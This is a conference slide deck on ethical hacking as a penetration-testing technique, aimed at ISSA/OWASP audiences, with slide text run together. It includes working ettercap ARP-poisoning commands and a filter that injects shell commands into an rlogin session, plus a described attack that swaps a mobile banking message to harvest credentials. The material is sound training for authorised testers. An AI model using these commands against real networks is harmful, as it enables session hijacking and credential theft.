WIXLIB

Ethical Hacking as a ProfessionalPenetration Testing TechniqueRochester ISSA ChapterRochester OWASP ChapterRalph Durkee - Durkee Consulting, Inc.info@rd1.net

2Ralph Durkee BackgroundFounder of Durkee Consulting since 1996Founder of Rochester OWASP since 2004President of Rochester ISSA ChapterPenetration Tester, Security Trainer,Incident Handler and AuditorApplication Security, development, auditing, PCIcompliance, penetration testing and consultingCIS (Center for Internet Security) – development ofbenchmark security standards – Apache, Linux, BINDDNS, OpenLDAP, FreeRadius, Unix, FreeBSDRalph DurkeeEH as PT Tech. 2013 Creative Commons 3.02

3AgendaWhat are Ethical Hacking & Penetration Testing?The Penetration Testing ProcessThe Ethical Hacking Mind SetEthical Hacking as a Pen Test TechniqueExamples: Exploiting Clear Text Session Exploiting Web Applications Exploiting Mobile ClientsSummaryRalph DurkeeEH as PT Tech. 2013 Creative Commons 3.03

4Definition: Ethical HackingHacking – Manipulating things to do stuffbeyond or contrary to what was intended bythe designer or implementer.Ethical Hacking – Using hacking andattack techniques to find and exploitvulnerabilities for the purpose of improvingsecurity with the following: Permission of the owners In a professional and safe manner Respecting privacy and propertyRalph DurkeeEH as PT Tech. 2013 Creative Commons 3.04

5Definition: Penetration TestingProfessional process to model techniques of real worldattackers on a defined target to find and exploitvulnerabilities for the purpose of improving security.Makes use of and includesethical hacking techniques.Has a more limited focus andis a subset of Ethical Hacking.Must remain within the defined scope and rules ofengagement, and be done in a professional, ethical, legaland relatively safe manner.Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.05

6Penetration Testing ProcessDocument Scope & Rules of EngagementDaily and Emergency ReportingPlanning and ReconnaissanceScanningExploitationTeam Work - Notes,Coordination & CommunicationFinal Report and ReviewRalph DurkeeEH as PT Tech. 2013 Creative Commons 3.06

7The Ethical Hacker MindsetThinking like an attackerCurious to explore and understandhow something worksWhat happens if we don't followthe rules or protocols?Going beyond what is expected and ordinaryWhat rules are enforced, how are they enforced andhow can they be by-passed?Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.07

8Tools as a Pen Test TechniqueCommon PT Approach:1.2.Learn a set Pen Test tools andhow they exploit vulnerabilitiesRun the tools where appropriate and report theexploits.Easier to learn and more easily automatedMisses logical types of vulnerabilities suchas flaws in business logic or access controlsRalph DurkeeEH as PT Tech. 2013 Creative Commons 3.08

9Ethical Hacking as aPen Test Technique1. Decompose the system and the applications What are the critical components? How do those components work? What are the implied and explicit rules andexpectations of each component?2. Postulate how the components could bemanipulated or by-passed toviolate the expectations and rules3. Develop, test and report.Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.09

10Tools Are Still ImportantThe tools are still necessary and importantHowever tools are just tools, and they will let you down attimes.Be prepared with multiple tools that perform the same orsimilar attacks.Prefer tools that “Plays well with others”Need the lower level simple tools as well as the high leveldo-everything attack toolsRalph DurkeeEH as PT Tech. 2013 Creative Commons 3.010

11Trying out theEH MindsetLet's start with some basic questions.What's wrong with using rlogin or telnet? Is rlogin without a password OK? How about Telnet with 2-factor authentication? Let's try the EH approach:What happens when a user types?# rlogin myhost.rd1.net Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.011

12Decompose rloginResolve Host name to IP Address Check local system host fileWindows\System32\drivers\etc\hostsLocal host and external DNS Cache External recursive DNS queryNetwork Routing ConsultationTranslate IP addresses to MAC addressesTCP handshake and connectionUser/Password and/or IP based AuthenticationSend Commands and Receive Response Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.012

13Options for Attacking rloginaka Threat ModelingModify the client local hosts fileVarious DNS Cache poisoningIP Routing attacksIP SpoofingARP Spoofing(or ARP cache poisoning)Grab password off the networkGrab password with malicious rlogin serverSession modification, injection or hijackingRalph DurkeeEH as PT Tech. 2013 Creative Commons 3.013

14Exploit 1: Bring the attackstogether for an rlogin exploitInjecting commands on a root rlogin session.First we'll use ARP cache poisoning withettercap to bring the traffic into the PT system.The Network ConfigurationClient Victim10.10.1.51Network mask255.255.255.0Client gateway10.10.1.1Server Victim10.10.0.100PT system10.10.1.145Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.014

16Exploit 1:Before the ARP MITM AttackVictim ClientClient LANGateway SwitchNormal Client Trafficto/from ServerPen Test Attack LaptopRalph DurkeeEH as PT Tech. 2013 Creative Commons 3.016

17Exploit 1:After the ARP MITM AttackClient LANGateway SwitchVictim ClientPen Test Attack LaptopRalph DurkeeEH as PT Tech. 2013 Creative Commons 3.017

18Exploit 1:Injecting in the rlogin sessionWe'll use an ettercap filter to inject a command.# cat rlogin-filter.txtif (ip.dst '10.10.0.100' && tcp.dst 513 ) {drop(); inject("./rlogininject.txt" );}# cat rlogin-inject.txt/usr/bin/id; /bin/ping -c 2 10.10.1.145Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.018

19Exploit 1:Injecting in the rlogin session (2)Compile the filter and run ettercap against theclient - server IP addresses.# etterfilter -o rlogin.ecfrlogin-filter.txt# ettercap -q -p -F rlogin.ecf-T /10.10.1.51/ /10.10.0.100/Success is indicated when the pings showup to the PT system, and the responsefrom the commands will show up in thenetwork sniff of the rlogin session.Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.019

20Reporting the ExploitThe report should include:Detailed steps to reproducewith explanations.Detailed screens shots / output from theexploit – (Collect these early as you work)Explanation of the Business ImpactMight use an easier to understand exploitsuch as creating a new user.Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.020

21The EH Approachon HTTPS SessionsSome more questions:How does SSL work to protect a web server?Answer: It doesn't. It authenticates the web server andencrypts the communication.What happens when a user types in an https URL into abrowser?1. Same network components:Name – IP – Mac2. Complex SSL Handshake3. Server Certificate validation ( More . . . )Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.021

22The EH Approachon HTTPS Sessions4. Several HTTP client headers are sent5. HTTP GET request6. Server Headers returned7. HTML and other Web Content is returned8. Browser processes wide variety of content withadditional plug-ins and application handlers.9. Browser executes any JavaScript provided.10. Sending additional request for ALL referenced content11. There are many components available to attack!Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.022

23Exploit 2:Ethical Hacking a Web ServerCompared to rlogin the number of components isvery large and the processing can be verycomplex.There's also a lot of implied rules andexpectations.The server expects the client to use a normalbrowser; where “normal browser” implies a lotof complexity and many assumptions.Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.023

24Exploit 2:Ethical Hacking a Web ServerCommon Pen Tester’s Dilemma:So much to break, where to start? Test the critical components -authentication, authorization, access controls,session management, and communications.Look for the common mistakes (OWASP Top 10)Use proxies and automated scanners to find the easystuff, (OWASP ZAP Proxy) but don't stop there.Use pen testing guides (OWASP Testing Guide)Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.024

25OWASP Top 10OWASP Top 10 - 2013 – Release Candidate 1A1 - InjectionA6 – Sensitive Data ExposureA2 – Broken Authentication &Session ManagementA7 – Missing Function LevelAccess ControlA3 – Cross-Site Scripting (XSS)A8 – Cross-Site Request Forgery(CSRF)A9 – Using Components withKnown VulnerabilitiesA10 – Unvalidated Redirectsand ForwardsA4 – Insecure Direct ObjectReferenceA5 – Security MisconfigurationRalph DurkeeEH as PT Tech. 2013 Creative Commons 3.025

26Exploit 2: Not Playing by the RulesReplacing the BrowserNo reason the attacker has to use a browser.One very simple option is netcat nc rd1.net 80GET / HTTP/1.0HTTP/1.1 200 OKDate: Tue, 05 Mar 2013 02:56:50 GMTServer: ApacheLast-Modified: Tue, 28 Dec 2012 00:53:56 GMTAccept-Ranges: bytesRalph DurkeeEH as PT Tech. 2013 Creative Commons 3.026

27Exploit 2: Not Playing by the RulesSimple SSL BrowserFor attacking via SSL use socat!# socat - OPENSSL:www.owasp.org:443,verify 0GET / HTTP/1.0HTTP/1.1 200 OKDate: Tue, 05 Mar 2013 03:08:36 GMTServer: ApacheLast-Modified: Mon, 19 Jun 2012 14:47:16 GMTAccept-Ranges: bytesContent-Length: 338Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.027

28Zed Attack Proxy (ZAP)FeaturesIntercepting Proxy –Modify or resend all requests,responses and headers, even AJAX requests!Automated Scanner – Of coursePassive Scanner – Detect vulnerabilities as you browseSpider – Follow all links on the website, includingdynamic linksFuzzer - Generates attacks based on patternsSSL - Includes Client and Dynamic Server CertificatesPort Scanner – Helps find servers.And much moreRalph DurkeeEH as PT Tech. 2013 Creative Commons 3.028

29ZAP – Proxy ConfigurationRalph DurkeeEH as PT Tech. 2013 Creative Commons 3.029

30Pen Testing Web Applicationswith OWASP Zed Attack ProxyPen. Tester’s Attack ComputerAll request andresponses may beanalyzed and modifiedusing the proxy!Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.030

31Not playing by the Rules OWASP Zed Attack ProxyRalph DurkeeEH as PT Tech. 2013 Creative Commons 3.031

32Not playing by the Rules OWASP Zed Attack Proxy (2)Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.032

33OWASP ZAPEditing and ResendingRalph DurkeeEH as PT Tech. 2013 Creative Commons 3.033

34OWASP ZAPChanging the MethodRalph DurkeeEH as PT Tech. 2013 Creative Commons 3.034

35Exploit 3:Attacking the Mobile Web ClientA Mobile Banking App displays a consumer messagethat is downloaded via HTTP.HTTP is as easily attacked with the same technique asrlogin.Attack uses session modification to replace the consumermessage with a message that tells the user toreauthenticate.Looks like the real bank app login form!No URL displayed, No way to tell the difference!Username and Password goes to the attacker’s server.Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.035

36Exploit 3: Mobile Web ClientOverview1. The attack starts the same as the rlogin with the ARP2.3.4.5.6.cache poisoning of the client.Then sniff the http traffic to determine the IP address ofthe server and the consumer message to be replaced.We craft an ettercap filter script to replace the consumermessage with message to reauthenticateSet up a simple Web server with a bogus login formA second web server to receive the user name andpassword.Run the exploit; collect the user name and password!Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.036

37Exploit 3: Mobile Web ClientSetup Steps 1 & 21. The attack starts with the same ARP cache poisoning Client Victim: 10.20.30.116 Client gateway: 10.20.30.1ettercap -T -M arp /10.20.30.116/ /10.20.30.1/3. Use a network sniffer like wireshark or tcpdump toverify the traffic flow to the server and check for serverIP address and consumer message.tcpdump -nn host 10.20.30.116 and port 80Ralph DurkeeEH as PT Tech. 2013 Creative Commons 3.037